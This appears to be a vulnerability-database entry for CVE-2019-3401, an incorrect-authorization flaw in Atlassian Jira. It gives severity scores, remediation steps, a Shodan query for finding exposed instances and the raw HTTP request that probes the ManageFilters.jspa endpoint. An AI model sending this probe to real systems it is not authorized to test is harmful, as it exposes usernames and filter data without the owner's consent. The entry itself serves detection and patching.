| Title | Atlassian Jira <7.13.3/8.0.0-8.1.1 - Incorrect Authorization |
|---|---|
| Author | TechbrunchFR,milo2012 |
| Severity | Medium |
| Impact | The vulnerability allows unauthorized users to access sensitive information or perform unauthorized actions. |
| Remediation | Ensure this permission is restricted to specific groups that require it via Administration > System > Global Permissions. Turning the feature off will not affect existing filters and dashboards. If you change this setting, you will still need to update the existing filters and dashboards if they have already been shared publicly. Since Jira 7.2.10, a dark feature to disable site-wide anonymous access was introduced. |
| CVSS Score | 5.3 |
| EPSS Score | 0.64371 |
| CVE ID | CVE-2019-3401 |
| CWE ID | CWE-863 |
| Shodan Query | http.component:"Atlassian Jira"http.component:"atlassian jira"http.component:"atlassian confluence"cpe:"cpe:2.3:a:atlassian:jira" |
| Tags | cve cve2019 jira atlassian exposure vuln |
Atlasssian Jira before version 7.13.3 and from version 8.0.0 before version 8.1.1 is susceptible to incorrect authorization. The ManageFilters.jspa resource allows a remote attacker to enumerate usernames via an incorrect authorization check, thus possibly obtaining sensitive information, modifying data, and/or executing unauthorized operations.
GET /secure/ManageFilters.jspa?filter=popular&filterView=popular HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.79 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip
🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2019/CVE-2019-3401.yaml
🦈 Packet Capture: ⬇️ Download cve-2019-3401.pcap
N/AN/A